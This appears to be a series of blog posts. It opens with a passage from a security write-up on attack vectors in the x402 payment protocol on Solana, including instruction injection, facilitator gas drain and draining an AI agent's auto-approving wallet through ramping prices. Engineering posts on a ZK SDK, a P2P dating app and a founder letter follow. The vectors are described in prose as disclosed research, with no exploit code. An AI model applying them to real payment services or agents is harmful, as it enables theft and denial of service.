A client can submit the same `PAYMENT-SIGNATURE` to multiple facilitators in parallel, or race the facilitator's submission with a conflicting transaction posted directly to Solana. Settlement double-execution lasts as long as the blockhash is valid (~60s). **Vector 2 (Partial Signing).** The client builds the entire transaction. The facilitator validates structure but typically doesn't audit *every byte* of every instruction. A malicious client appends extra instructions — a token-2022 hook, a clawback, an arbitrary CPI — that fire after the transfer. **Vector 3 (Facilitator Gas Drain).** The protocol specifies no per-client rate limit on the facilitator. Crafted transactions that **fail validation in the worst possible way** (consuming maximum CU before reverting) are still paid for by the facilitator. Economic DoS. **Vector 6 (AI-Agent Wallet).** The agent has a programmatic keypair and auto-approves payments below a price threshold. A service that starts at $0.001/req and ramps to $0.10/req over 1000 requests drains the wallet *without ever crossing the threshold*. The threshold check is done per-request, not per-session, not per-vendor. **Vector 9 (Amount Parsing).** Amounts in x402 are JSON strings like `"1000"`. Different implementations parse `"1000"` vs `"1e3"` vs `" 1000 "` vs `"+1000"` vs `"01000"` differently. Mismatch between facilitator's validator and Solana's actual transfer = monetisable. ## Disclosure posture This is **public research** against an open protocol with multiple independent implementations. I did not test against any specific facilitator without permission. The PoCs target a mock facilitator I wrote in the [research/](https://github.com/Dax911/x402_mal/tree/main/research) tree. For specific vendor implementations: - I have not contacted Coinbase. The protocol is open; the bugs are in the spec, not in any single implementation. - If your team operates an x402 facilitator and any of this looks live in your code: please email me. 
Bridge: [haydenaylor911@gmail.com](mailto:haydenaylor911@gmail.com).
- I'll honour a 90-day embargo if you have a remediation plan.

## What's coming in the series

5 deep-dive posts on the highest-impact vectors:

1. [Settlement race condition](/blog/x402_settlement_race_condition/) — Vector 1, double-spend within blockhash validity
2. [Partial-signing instruction injection](/blog/x402_partial_signing_injection/) — Vector 2, append-and-execute
3. [Facilitator gas drain](/blog/x402_facilitator_gas_drain/) — Vector 3, economic DoS
4. [AI-agent wallet drain](/blog/x402_ai_agent_wallet_drain/) — Vector 6, slow-burn pricing
5. [Amount-string parser fuzzing](/blog/x402_amount_string_parser/) — Vector 9, JSON-numeric edge cases

Plus a sweep post for Vectors 4, 5, 7, 8 once the PoCs land.

## Bibliography

- Coinbase Developer Platform. *x402 Specification.* https://x402.org/
- HTTP/1.1: Semantics. *RFC 7231 §6.5.2 (402 Payment Required).*
- Solana Foundation. *VersionedTransaction documentation.*
- [Dax911/x402_mal](https://github.com/Dax911/x402_mal) — research repo; SOLMAL.md is the threat-model log.

Next in the series: [Settlement race condition →](/blog/x402_settlement_race_condition/)

---

# Building the Zera SDK: Day One

Canonical: https://blog.skill-issue.dev/blog/zera_sdk_scaffolding/
Description: Sixteen commits in fourteen minutes. The first day of the @zera-labs/sdk monorepo — Rust core via neon-rs, TypeScript scaffolding, Poseidon, Merkle trees, ZK provers, and an MCP server for AI agents.
Published: 2026-03-05T21:54:29.000Z
Tags: zera, typescript, rust, sdk, zk, poseidon, mcp, solana

> "init monorepo structure"

That commit message — [`af8cc28`](https://github.com/Dax911/zera-sdk/commit/af8cc28644e055bebc6e6688c3b7d534aca5b202), 2026-03-05T21:54:29Z — is when the Zera SDK began.
Sixteen commits and fourteen minutes later, the scaffolding was done: a Rust crate, a Neon native binding, a TypeScript SDK with Poseidon + Merkle + provers + transaction builders, and an MCP server. The whole arc is visible on [the commit log](https://github.com/Dax911/zera-sdk/commits/main) — all sixteen commits inside a fourteen-minute window, every commit doing exactly one thing. This post is about how the day-one scaffolding was structured, why I split it into 16 atomic commits, and what each piece actually does.

## The shape of the monorepo

Four packages from the start:

```
packages/
  zera-core/     # Rust crate — circuit-aligned crypto primitives
  zera-bindings/ # Neon-rs node bindings exposing zera-core to JS
  sdk/           # @zera-labs/sdk — TypeScript SDK
  mcp-server/    # @zera-labs/mcp-server — MCP tools for AI agents
```

The reason `zera-core` exists in Rust is that the on-chain Solana program is also in Rust, and the SDK has to compute Poseidon commitments and Groth16 proof formatting *exactly* the way the on-chain verifier does. JS and Rust agreeing on a 254-bit field element is the kind of thing that goes wrong silently. Moving the canonical implementation to Rust and exposing it to JS via Neon kept the two halves bitwise consistent.

The TypeScript SDK is what 95% of users will touch. The MCP server is the bet that the next class of "user" will be an AI agent, not a human in a wallet popup.
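That "goes wrong silently" failure is concrete enough to pin down in a test. Here is a minimal Python sketch of the invariant a cross-language consistency test has to enforce: one canonical byte encoding for field elements on both sides of the FFI. The 32-byte little-endian choice and the function names are my illustration, not necessarily what zera-core actually uses.

```python
# Sketch of the invariant a JS <-> Rust consistency test pins down: one
# canonical byte encoding for BN254 field elements, with out-of-range
# values rejected loudly instead of silently reduced.

BN254_PRIME = 21888242871839275222246405745257275088548364400416034343698204186575808495617

def fe_to_bytes(x: int) -> bytes:
    """Encode a field element canonically; reject out-of-range values."""
    if not 0 <= x < BN254_PRIME:
        raise ValueError("not a canonical field element")
    return x.to_bytes(32, "little")

def fe_from_bytes(b: bytes) -> int:
    """Decode, refusing non-canonical (>= p) encodings."""
    x = int.from_bytes(b, "little")
    if x >= BN254_PRIME:
        raise ValueError("non-canonical encoding")
    return x

# The property both halves must agree on: encode/decode round-trips
# bit-exactly for every element, including ones far above 53 bits.
x = BN254_PRIME - 1
assert fe_from_bytes(fe_to_bytes(x)) == x
```

A cross-language test then feeds the same random elements through the Rust encoder and this reference and asserts byte equality, which is exactly the kind of check atomic scaffolding makes easy to bolt on later.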
## Atomic commits as a design discipline If you scan the [commit log](https://github.com/Dax911/zera-sdk/commits/main), you'll see this pattern from `af8cc28` through `e350707`: ``` af8cc286 init monorepo structure 7ba37e6e add zera-core rust crate d605b930 add neon-rs node bindings for zera-core 4aaa8def add ts sdk package scaffolding + crypto primitves 26f77955 add note mgmt, merkle tree, pda helpers, utils f713bb3f add zk prover + voucher system cd518d5a add transaction builders for deposit/withdraw/transfer 0debc6af add tree state client for fetching merkle tree from chain f4beda30 add ZeraClient high-level wrapper + NoteStore 27786470 update barrel exports w new modules d150f829 add mcp server package for ai agent integration 98bc0a88 add core sdk documentation dc2937ae add agentic integration guide + use cases af03daf2 add examples, security doc, and current status analysis ``` Each commit is one logical concept and nothing else. The reason this matters: when you're scaffolding a 200-file SDK in a single session, the sane way to bisect a regression two months later is to `git revert` a single concept. If the Merkle tree breaks, you revert `26f77955`. If the prover wires wrongly, you revert `f713bb3f`. If you ship the whole thing as one mega-commit, you can't isolate. It also makes the SDK reviewable. There's no "Initial commit (12,000 lines)." You can read it in 14 minutes the way I wrote it in 14 minutes. ## The crypto layer The cryptographic foundation is in [`packages/sdk/src/crypto/poseidon.ts`](https://github.com/Dax911/zera-sdk/blob/4aaa8def935c617cb447040bb6cb6f22aeefbf4e/packages/sdk/src/crypto/poseidon.ts). Poseidon is the hash function we use everywhere — for note commitments, for Merkle nodes, for nullifiers. It's circuit-friendly, which means it's cheap to prove inside a Groth16 circuit. SHA-256 inside a circuit is *thousands* of constraints. Poseidon is dozens. 
```ts
import { buildPoseidon } from "circomlibjs";

let poseidonInstance: any = null;

export async function getPoseidon(): Promise<any> {
  if (!poseidonInstance) poseidonInstance = await buildPoseidon();
  return poseidonInstance;
}

export async function poseidonHash(inputs: bigint[]): Promise<bigint> {
  const poseidon = await getPoseidon();
  const hash = poseidon(inputs.map((v: bigint) => poseidon.F.e(v)));
  return BigInt(poseidon.F.toObject(hash));
}

export async function poseidonHash2(left: bigint, right: bigint): Promise<bigint> {
  return poseidonHash([left, right]);
}
```

The singleton is load-bearing. `buildPoseidon` initializes WASM that takes ~80ms cold. If every Merkle node hash had to spin that up, building a tree with `TREE_HEIGHT = 24` would take 30 seconds.

## Notes are bigints all the way down

From [`types.ts`](https://github.com/Dax911/zera-sdk/blob/4aaa8def935c617cb447040bb6cb6f22aeefbf4e/packages/sdk/src/types.ts):

```ts
export interface Note {
  amount: bigint;
  asset: bigint;
  secret: bigint;
  blinding: bigint;
  memo: [bigint, bigint, bigint, bigint];
}

export interface StoredNote extends Note {
  commitment: bigint;
  nullifier: bigint;
  leafIndex: number;
}
```

Every field is a `bigint`. The reason: every field has to be reducible mod the BN254 prime to enter a circuit, and that's a 254-bit operation. JS `Number` is 53 bits. Using `bigint` from day one means every constant in the SDK is correct as written:

```ts
export const BN254_PRIME = BigInt(
  "21888242871839275222246405745257275088548364400416034343698204186575808495617",
);
```

The cost of `bigint` everywhere is that you can't `Math.max` your way out of a comparison. The benefit is that you can never lose a low bit by accident.
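The 53-bit ceiling is easy to see concretely. Python floats are the same IEEE-754 doubles as a JS `Number`, so the failure mode demos in a few lines:

```python
# Why bigint everywhere: a float64 (what a JS Number is) carries 53 bits of
# mantissa, so a 254-bit field element loses its low bits without any error.

BN254_PRIME = 21888242871839275222246405745257275088548364400416034343698204186575808495617

rounded = int(float(BN254_PRIME))  # simulate routing the value through a JS Number
print(rounded == BN254_PRIME)      # False: the low bits are silently gone

# The same failure in miniature: 2**53 + 1 is the first integer a double can't hold.
print(float(2**53) == float(2**53 + 1))  # True: two different ints, one float
```

No exception is raised at any point, which is exactly why the corruption is "silent" and why the constants above are written as `BigInt` strings rather than numeric literals.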
## `createNote`: the most important six lines

```ts
import { randomBytes } from "crypto";

function randomFieldElement(): bigint {
  const bytes = randomBytes(31); // 248 bits – safely below the 254-bit prime
  const value = BigInt("0x" + bytes.toString("hex"));
  return value % BN254_PRIME;
}

export function createNote(
  amount: bigint,
  asset: bigint,
  memo?: [bigint, bigint, bigint, bigint],
): Note {
  return {
    amount,
    asset,
    secret: randomFieldElement(),
    blinding: randomFieldElement(),
    memo: memo ?? [0n, 0n, 0n, 0n],
  };
}
```

The note's `secret` is what derives the nullifier. If you can predict it, you can predict the nullifier, and your transaction is forensically linkable. Sampling 248 bits and reducing mod the BN254 prime is the standard recipe; sampling 256 bits would bias the distribution slightly toward small field elements after the modular reduction.

## Transaction builders: the SDK's actual surface area

From [`tx/deposit.ts`](https://github.com/Dax911/zera-sdk/blob/cd518d5ace208ebebf5852ed38c8dff11b6d23b4/packages/sdk/src/tx/deposit.ts):

```ts
export function buildDepositTransaction(params: DepositParams): Transaction {
  const { payer, mint, amount, commitment, proof, publicInputs, programId } = params;

  // Derive PDAs
  const [poolConfig] = derivePoolConfig(mint, programId);
  const [merkleTree] = deriveMerkleTree(mint, programId);
  const [vault] = deriveVault(mint, programId);
  // ...
}
```

Three transaction builders: `buildDepositTransaction`, `buildWithdrawTransaction`, `buildTransferTransaction`. Each one consumes a Groth16 proof + commitment, derives the right PDAs, and returns an unsigned `Transaction`. The signing is intentionally not the SDK's job. That's the wallet's job, and embedding signing in an SDK is what gives you a tarball of leaked keys six months later.

## ZeraClient: the high-level wrapper

By the time we got to `f4beda30 — add ZeraClient high-level wrapper + NoteStore`, the lower-level pieces were composable enough that one class could orchestrate them.
The wrapper takes a config: ```ts export interface ZeraClientConfig { rpcUrl: string; programId?: string; circuits: { deposit: CircuitPaths; withdraw: CircuitPaths; transfer: CircuitPaths; }; noteStore?: NoteStore; cacheEndpoint?: string; } ``` …and exposes one method per high-level operation. `client.deposit(amount, mint)`, `client.withdraw(commitment)`, `client.transfer(amount, recipient)`. Behind each method is the pipeline: fetch tree state → load relevant circuit WASM → prove → build tx → return unsigned `Transaction` for the wallet to sign. `NoteStore` is an interface with one default in-memory implementation and a contract that says "if you persist notes, you're responsible for not leaking them." Most consumers will plug an encrypted file backend. The wallet demo plugs Tauri's filesystem with Argon2id-derived keys; we'll get to that in [the Zera Wallet v3 post](/blog/zera_wallet_v3_zkp/). ## MCP: betting on agents The most experimental thing on day one was `@zera-labs/mcp-server`. From [`packages/mcp-server/src/index.ts`](https://github.com/Dax911/zera-sdk/blob/d150f8294dca2bdcfd4f3b38da53b346aef64773/packages/mcp-server/src/index.ts): ```ts const server = new McpServer({ name: "zera-protocol", version: "0.1.0" }); server.tool( "zera_deposit", "Deposit USDC into the ZERA shielded pool. Funds become private and untraceable after deposit.", { amount: z.number().positive().describe("Amount of USDC to deposit (e.g., 100.50)"), memo: z.string().optional().describe("Optional memo for your records (stored privately, never on-chain)"), }, async ({ amount, memo }) => { /* … */ }, ); ``` If the only thing that talks to your protocol is wallets, your TAM is "humans who installed an extension." If MCP-connected agents can also call your protocol, your TAM is "every Claude/Cursor/Cline session anyone runs." That's a 100× delta. The bet is cheap — `mcp-server` is one ~400-line file plus the SDK it depends on. 
If agents end up *not* using zk-shielded pools, I lose 400 lines. If they do, I get there first.

## Trade-offs

**Why circomlibjs instead of a hand-rolled Poseidon?** Because circomlib is the canonical implementation that the circuits are written against. Re-implementing Poseidon for the host is exactly the kind of "I'll save 50ms" choice that fails an end-to-end test in week three.

**Why Neon instead of WASM for `zera-core`?** Because the SDK ships to Node and to a Tauri webview, both of which natively support `.node` files. WASM would have meant another loader, another fetch, another async boundary. Neon is one `require`.

**Why ship the MCP server in the same monorepo?** Because the moment you give it its own repo, it falls behind on SDK changes. Same monorepo, same `pnpm-workspace.yaml`, same lockfile. One `pnpm install` and you're done.

## What this taught me

Atomic commits are the difference between an SDK that's reviewable and an SDK that's trusted. Every dependency relationship in the scaffolding above is one-directional and one-commit-at-a-time. That's why the 144-test suite ([`809274f5`](https://github.com/Dax911/zera-sdk/commit/809274f5d2f8d3708cb09f6a353fec889994d59c)) that landed three weeks later could be written without rewriting any of the underlying code — see [the next post](/blog/zera_sdk_test_suite/).

## Further reading

- [zera-sdk on GitHub](https://github.com/Dax911/zera-sdk)
- [The 16-commit scaffolding sequence](https://github.com/Dax911/zera-sdk/commits/main)
- [circomlibjs — Poseidon implementation](https://github.com/iden3/circomlibjs)
- [Neon — Rust ↔ Node bindings](https://neon-bindings.com/)
- [Model Context Protocol](https://modelcontextprotocol.io/) — the spec MCP servers implement.
- [Building A Better Cryptocurrency](/blog/a_better_crypto/) — the privacy thesis these primitives implement.
--- # Cruiser: A Tauri Hookup App on iroh, Geohash-Bucketed Presence, and Why P2P Dating Is Actually Fine Canonical: https://blog.skill-issue.dev/blog/cruiser_iroh_gossip_p2p/ Description: A Tauri 2 + React + iroh-gossip dating app where peers find each other by geohash, broadcast presence on a topic-per-bucket, and DM each other with consent signals — all without a central server. The architecture is the product. Published: 2026-02-26T15:15:06.000Z Tags: cruiser, tauri, iroh, p2p, gossip, rust, geohash, solana The dating app market in 2026 is two things: dystopian centralized platforms (Match Group's stable: Tinder, Hinge, OkCupid, etc.) and crypto-bro-coded alternatives that promise decentralization but ship a Mongo cluster behind the API. Neither is what the queer community I built Cruiser for actually wanted. They wanted **a dating app where the only servers were the participants' own devices**, where presence was bucketed by location without any single party seeing all locations, and where the wallet was the identity but the wallet wasn't a custody surface. Cruiser shipped on 2026-02-26 in [`4cecbd4 — Cruiser: P2P hookup app — Phases 1–26`](https://github.com/Dax911/cruiser/commit/4cecbd4cf64fe2bdcd44f0aa3b6db83b1ebd3a05). 89 files. ~20,000 lines. Tauri 2.x for the desktop wrapper, React 18 + Zustand for the UI, [iroh-gossip](https://github.com/n0-computer/iroh) for the P2P transport, Solana for the wallet/payment rails. The full mono-commit is the result of 26 phases of design + implementation that I'd been working on locally, then squashed into one commit before pushing. This post is about the gossip-presence architecture in particular, because that's where the "no servers" promise actually has to be defended. ## The geohash topic split iroh-gossip is a publish/subscribe protocol over a peer-mesh, with content-addressed `TopicId`s. Every peer that subscribes to a `TopicId` joins the same gossip mesh and exchanges messages. 
The naive thing is to use *one* topic for the whole app — `cruiser/v1` — and broadcast every presence announce to every peer. This is a privacy disaster. It means every peer sees every other peer's broadcast, including their location. The architecture that ships in Cruiser is per-geohash topics:

```rust
// src-tauri/src/gossip_presence.rs
const AREA_TOPIC_PREFIX: &str = "cruiser/area/v1/";

let topic_bytes = location::topic_from_geohash(AREA_TOPIC_PREFIX, geohash6);
let topic_id = TopicId::from_bytes(topic_bytes);
```

The topic is `cruiser/area/v1/<geohash6>`. **Every 6-character geohash bucket is its own topic.** A geohash6 covers approximately a 1.2 km × 0.6 km area — small enough to be a single neighborhood, large enough to have actual users in it. Two peers join the same topic only if they're in the same geohash6 bucket.

This is the privacy architecture in one decision: **you can only see the presence of peers who chose to be visible in the same geographic bucket as you.** A peer in San Francisco can't see a peer in Berlin's gossip. Even within a city, a peer in the Mission can't see a peer in the Castro, because those are different geohash6 buckets.

The cost of this design: peers walk between geohash6 boundaries (you cross a street, you're in a new bucket). The app handles this by *leaving* the old topic and *joining* the new one whenever the user's geohash6 changes. That's the lifecycle the `ActiveArea` struct manages:

```rust
pub struct ActiveArea {
    pub topic_id: TopicId,
    pub geohash6: String,
    pub sender: Arc<GossipSender>,
    broadcast_handle: JoinHandle<()>,
    receive_handle: JoinHandle<()>,
    reaper_handle: JoinHandle<()>,
}

impl ActiveArea {
    pub fn leave(self) {
        self.broadcast_handle.abort();
        self.receive_handle.abort();
        self.reaper_handle.abort();
    }
}
```

`leave` aborts all three Tokio tasks — broadcast loop, receive loop, peer-cache reaper — and drops the topic subscription. The next location update triggers a `join_gossip_area` for the new geohash, and the cycle repeats.
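The only "protocol" here is that every peer independently derives the same 32-byte `TopicId` from the same bucket string, with no coordination server. A hedged Python sketch of that property — the real derivation lives in Cruiser's Rust `location` module, and the SHA-256 choice below is my stand-in for whatever it actually uses:

```python
import hashlib

AREA_TOPIC_PREFIX = "cruiser/area/v1/"

def topic_from_geohash(prefix: str, geohash6: str) -> bytes:
    """Derive a 32-byte topic ID from a geohash bucket. Any two peers that
    compute the same prefix+bucket string land on the same gossip topic."""
    return hashlib.sha256((prefix + geohash6).encode()).digest()

# Two peers in the same ~1.2 km x 0.6 km bucket derive the same topic...
a = topic_from_geohash(AREA_TOPIC_PREFIX, "9q8yyk")
b = topic_from_geohash(AREA_TOPIC_PREFIX, "9q8yyk")
assert a == b

# ...while a peer one bucket over lands on a completely different mesh.
c = topic_from_geohash(AREA_TOPIC_PREFIX, "9q8yym")
assert a != c

print(len(a))  # 32
```

The hash also makes the topic ID opaque: seeing a `TopicId` on the wire doesn't reveal the geohash unless you already know the bucket and can recompute it.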
## The three tasks per area

Every joined area spawns:

1. **A broadcast task** that sends a `PresenceAnnounce` (your profile snippet, your endpoint ID, your tags) every 30 seconds.
2. **A receive task** that handles incoming announces and updates a local `PeerCache`.
3. **A reaper task** that runs every 60 seconds and evicts peers that haven't announced in 90 seconds.

```rust
const BROADCAST_INTERVAL_SECS: u64 = 30;
const REAPER_INTERVAL_SECS: u64 = 60;
```

The 30s broadcast / 90s eviction (= reap if no announce in 3 broadcasts) gives you a "go offline within 90s" guarantee. If a peer disconnects from WiFi, walks out of range, or quits the app, every other peer's view of them ages out within a minute and a half. No central server needed to mark them offline.

This is the *whole* mechanism for "who's online right now in your area." There is no `presence-server.cruiser.app/online`. The presence is the gossip itself.

## What an announce looks like

```rust
// src-tauri/src/presence.rs (simplified)
#[derive(Serialize, Deserialize, Clone)]
pub struct PresenceAnnounce {
    pub endpoint_id: String,  // iroh node ID — the P2P address
    pub geohash6: String,     // your bucket (intentionally redundant for receivers)
    pub display_name: String,
    pub avatar_hash: String,  // CID of avatar image; sender mirrors via iroh-blobs
    pub bio_short: String,    // ~80 chars max
    pub energy: String,       // a profile field — "🔥 high energy", "🌙 chill", etc.
    pub tags: Vec<String>,    // user-set tags for search/filter
    pub last_seen_ms: u64,    // sender's local clock at announce time
    pub signature: String,    // ed25519 sig over the rest, by the user's identity key
}
```

A few interesting design calls:

**Avatar by CID, not inlined.** The avatar is a hash; the actual image bytes are fetched via [iroh-blobs](https://docs.rs/iroh-blobs/) on a separate transport from the gossip topic. Inlining the avatar would balloon every announce to ~50KB and make the gossip topic unreasonably noisy. CID + lazy fetch is ~256 bytes per announce.
**`signature` is the integrity surface.** Every announce is signed by the user's identity key. A peer receiving an announce verifies the signature before adding it to the peer cache. Without this, anyone could broadcast an announce claiming to be anyone else; with it, an impostor announce is detected and dropped.

**`last_seen_ms` is the announcer's clock.** Not a synchronized clock. The receiver uses this for "rough freshness" but not for anti-replay — anti-replay is handled by the iroh-gossip layer's own message dedup based on content hash + topic.

## Direct messages: a separate topic per pair

DMs work the same way, with a different topic shape. From `src-tauri/src/gossip_dm.rs`:

```
cruiser/dm/v1/<sorted-endpoint-ids>
```

The endpoint IDs of the two peers are sorted lexicographically and concatenated. Both peers compute the same topic ID. Joining the topic establishes a 2-peer gossip mesh. Messages are encrypted with `nacl.box` (XSalsa20-Poly1305) using the peers' x25519 keys, derived from their ed25519 identity keys.

The threat model:

- **An eavesdropper on the gossip mesh** sees the topic ID (which is opaque without the endpoint IDs that produced it) and ciphertext. They learn nothing about the participants or content.
- **A passive observer of the iroh DHT** sees the two endpoint IDs subscribing to a common topic, which leaks "these two people are in a DM" but not the content. Acceptable; DMs in any system leak metadata at this level.
- **A man-in-the-middle** can't insert messages, because they're encrypted with `nacl.box` keyed to the receiver's pubkey. They can't silently drop messages either: there are no acks, but a gap in the message ordering would be visible to the receiver.

The DM topic also handles tips, consent signals, location sharing, typing indicators, read receipts, and emoji reactions. All of those are just message variants in the same encrypted topic — there's no separate channel for them.
The reason: a separate channel for "I'm typing" would itself leak the metadata "person A is typing to person B" without authentication. Folding everything into the encrypted DM topic eliminates that side channel. ## Why iroh-gossip and not libp2p I evaluated three P2P stacks before landing on iroh: - **libp2p (Rust):** the de-facto standard. Powerful, but operationally heavy — DHT, NAT traversal, transports, and a non-trivial topology config. It's overkill for a single-purpose app. - **GossipSub (libp2p):** the gossip protocol within libp2p. Closer to what I needed, but still requires the full libp2p stack as host. - **iroh + iroh-gossip:** purpose-built for "P2P Rust app needs gossip." Smaller surface area, batteries-included relay/DHT/NAT-traversal via iroh's hosted public infrastructure. Subjectively faster to ship. iroh hosts a public relay infrastructure (`relay.iroh.network`) that handles NAT traversal and STUN-style address discovery. Most home users are behind NAT, so without relay infrastructure most P2P apps don't work in practice. iroh's relay is opt-in and free for development; that's what I used. The trade-off: **iroh is younger than libp2p**, the API surface is still moving, and the network effects are smaller (fewer peer apps to interop with). For Cruiser this is fine — there are no peer apps it needs to interop with — but for a project that wanted to join the existing libp2p universe, iroh would be the wrong call. ## CoreLocation, IP fallback, and the geolocation rabbit-hole The whole gossip architecture above is meaningless without the user's actual location. Browser `navigator.geolocation` doesn't work in Tauri's macOS WKWebView (wry auto-denies the permission). The follow-up commit [`d2b9cc8 — Phase 27: Native CoreLocation for macOS`](https://github.com/Dax911/cruiser/commit/d2b9cc8) is where I solved that, and it's [its own post](/blog/cruiser_corelocation_objc2/). Worth noting here: the system has *three* fallback layers for location: 1. 
Native CoreLocation (macOS) / GeoClue2 (Linux) / Windows.Devices.Geolocation (Windows). Best accuracy.
2. IP-based geolocation via ipinfo.io. Used when native services are unavailable or denied.
3. Manual override (you type your geohash6 into a settings field). Used for testing and for users who don't want their actual location used.

Each layer feeds the same `geohash6` value to `join_gossip_area`. The peer doesn't care how the geohash was computed; they care that the geohash is honest and stable.

## What "Phase 1–26" means

The mono-commit covers 26 design phases. A non-exhaustive sample of what each phase added:

- Phase 1–3: Identity (ed25519 key + Solana pubkey).
- Phase 4–6: Profile (avatar, bio, energy, tags).
- Phase 7–9: Gossip presence (the architecture above).
- Phase 10–12: DM chat (encrypted, with media + tips + consent signals).
- Phase 13: Block list.
- Phase 14: Favorites.
- Phase 15: Notifications.
- Phase 16: Themes.
- Phase 17: Search.
- Phase 18: Onboarding (the new-user flow).
- Phase 19–21: Chat management (delete threads, relative timestamps, profile peek).
- Phase 22–25: Dev tools (seed peers for local testing, SOL airdrop UI).
- Phase 26: The final polish + the squash into one commit.

The reason to squash 26 phases into a single commit is that the local development repo had 200+ commits with messages like `wip` and `fix wallet sig` and `actually now it works`, and that's not a public history. The squash gives readers a single coherent diff that says "this is what shipped." The cost: you lose the ability to bisect within Phase 1–26. The benefit: you don't subject the public to a noisy 200-commit history.

## What I'd do differently

**The PeerCache should be persistent.** Right now, when you restart the app, you lose the in-memory peer cache and have to wait 30s for the next broadcast cycle to repopulate. Persisting it (and re-validating on next announce) would make the first second of app launch feel responsive instead of empty.
**The geohash6 boundary needs hysteresis.** Crossing a geohash boundary triggers a topic-leave / topic-join cycle. If you walk along the boundary you can flap between buckets every few seconds. The fix is to wait for a few consecutive readings on the new bucket before switching, or to subscribe to *both* buckets while in transition. Neither is implemented in the initial commit; both are easy add-ons. **The signature scheme should bind to the topic.** Right now an announce signed for topic A could be replayed on topic B by an adversary who controls a relay. Including the topic ID in the signed payload would prevent that. Easy fix; on the to-do list. ## Trade-offs **Why a desktop app first instead of mobile?** Because Tauri's desktop story was mature in 2025 and the iOS / Android mobile bindings were still beta. The [Phase 29 iOS commit](/blog/cruiser_ios_xcode_cloud/) shipped iOS support a few weeks later; Android is still pending. **Why Tauri instead of Electron?** Same reason as the [Zera Wallet v3](/blog/zera_wallet_v3_zkp/): smaller bundle, sane Rust↔JS IPC, and the Rust side can hold long-running background tasks (gossip loops, location service) without spinning up a separate process. **Why a per-pair DM topic instead of a single shared "DMs" topic?** Because per-pair topics are the right scope for routing — only the two participants subscribe — whereas a shared topic would require every peer to receive every DM and filter by recipient. That's both wasteful and a metadata leak. **Why no central reputation/abuse system?** Because the moment you ship a central reputation system, the system is no longer P2P. The Cruiser approach is: every peer maintains their own block list, locally. Abuse is mitigated by the absence of a global directory — you can only be discovered by people in your geohash6, so the attack surface is bounded by your physical area. 
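For what it's worth, the boundary hysteresis described under "What I'd do differently" is only about a dozen lines. A sketch in Python of the consecutive-readings approach (the class, the names, and the three-reading threshold are all mine, for illustration):

```python
# Hedged sketch of geohash-boundary hysteresis: only leave/join gossip
# topics after K consecutive readings agree on a new bucket, so walking
# along a boundary doesn't flap the topic subscription.

class BucketTracker:
    def __init__(self, initial: str, k: int = 3):
        self.active = initial  # bucket whose gossip topic we're currently joined to
        self.candidate = None  # bucket we've started seeing readings for
        self.streak = 0
        self.k = k

    def observe(self, geohash6: str) -> bool:
        """Feed one location reading; returns True when it's time to switch topics."""
        if geohash6 == self.active:
            self.candidate, self.streak = None, 0
            return False
        if geohash6 == self.candidate:
            self.streak += 1
        else:
            self.candidate, self.streak = geohash6, 1
        if self.streak >= self.k:
            self.active, self.candidate, self.streak = geohash6, None, 0
            return True
        return False

t = BucketTracker("9q8yyk")
# Flapping along the boundary: no topic churn.
print([t.observe(g) for g in ["9q8yym", "9q8yyk", "9q8yym", "9q8yyk"]])
# [False, False, False, False]

# A real move: three consecutive readings flip the bucket exactly once.
print([t.observe(g) for g in ["9q8yym", "9q8yym", "9q8yym"]])
# [False, False, True]
```

The dual-subscription variant (stay joined to both buckets during the transition) trades a little extra gossip traffic for zero presence gaps; this version trades a few seconds of lag for simplicity.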
## What this taught me

P2P-as-architecture is mostly *constraints management*: deciding what state is allowed to be global (almost nothing), what state is allowed to be partial (peer caches, ephemeral), and what state is fully local (your block list, your profile, your settings). Once you've drawn those lines, the rest of the design falls out.

The other thing I learned is that **iroh deserves more attention.** It's the smallest dependency I've ever shipped that supports a real P2P product. Most P2P stacks are 50,000-line behemoths. iroh-gossip + iroh-net + iroh-blobs is enough infrastructure for a real app and the code surface is comprehensible.

## Further reading

- [Cruiser on GitHub](https://github.com/Dax911/cruiser)
- [The Phase 1–26 mono-commit](https://github.com/Dax911/cruiser/commit/4cecbd4cf64fe2bdcd44f0aa3b6db83b1ebd3a05)
- [iroh on n0.computer](https://www.iroh.computer/) — the P2P stack.
- [`iroh-gossip` docs](https://docs.rs/iroh-gossip/) — the pub/sub layer.
- [Cruiser CoreLocation post](/blog/cruiser_corelocation_objc2/) — how the geolocation layer works.
- [Cruiser iOS + Xcode Cloud](/blog/cruiser_ios_xcode_cloud/) — the App Store push.
- [Cruiser+ landing page](/blog/cruiser_site_satori_poster/) — the marketing surface.

---

# Why I started Zera Labs

Canonical: https://blog.skill-issue.dev/blog/why_i_started_zera_labs/
Description: Three things became true in the same year — ZK got fast enough, Solana got cheap enough, and AI agents needed verifiable money. Sitting at the intersection felt like a ship date, not a thesis.
Published: 2026-02-20T08:00:00.000Z
Tags: founders, zera, zk, solana, ai, narrative, founder-letter

This is the post I keep wanting to skip. It's the founding letter — the one where I'm supposed to explain, in clean prose, why a perfectly happy senior IC with a security-research side hustle decided to incorporate a thing and put his name on the door. I have started writing it five times.
The other four versions all went a little too hard on the *grand cryptographic destiny of the human race* angle, which is not the kind of post I'd respect if I read it in someone else's feed. So here is the version that survived: three things became true at roughly the same time, in the same year, and sitting at the intersection of those three things felt much more like a ship date than a thesis. That's the whole pitch. The rest of this letter is just walking the three legs of the tripod.

## Leg one: ZK got fast enough to be boring

I have been reading zk papers for, depending on how you count, six or seven years. The thing about zk papers is that the *math* doesn't get faster — the math has been there since Goldwasser, Micali, and Rackoff's 1985 paper. What gets faster is the *engineering*. Better proving systems (Groth16 → PLONK → Halo2 → STARKs → folding schemes). Better hashes inside circuits (Pedersen → Poseidon → Reinforced Concrete). Better hardware (CPU SIMD → GPUs → FPGAs → the inevitable ASIC). Better libraries (snarkJS → arkworks → halo2 → Lurk → Risc Zero).

In 2018, you could prove a non-trivial program in a circuit and submit it to Ethereum, but you needed a research lab and a friend at a hardware accelerator company. In 2024, you could prove a non-trivial program in a circuit on a laptop in a few seconds and submit it to a chain that didn't price proof verification like a war crime. In 2026, the prover is fast enough that **a wallet can do it on the user's machine for a normal interactive payment** without the user noticing.

That last sentence is the entire reason ZK leaves the lab. The bar for "leaves the lab" is ruthless. It isn't "research demo at Devcon." It's: a non-technical user, on their existing laptop, opens a wallet, clicks Send, waits less than a coffee sip, and a Groth16 proof has gone over the wire to settle the transaction. Until that is true, ZK lives in conferences and academic papers. Once that is true, ZK eats a chunk of the financial system.
That is the point we are at right now. I built [zera-sdk](/blog/zera_sdk_scaffolding/) and the [Zera Wallet v3](/blog/zera_wallet_v3_zkp/) to be the first products to ship after that line was crossed. Not after the line will be crossed, after some round, after some grant. After. It already happened. We are mostly waiting for the rest of the industry to notice.

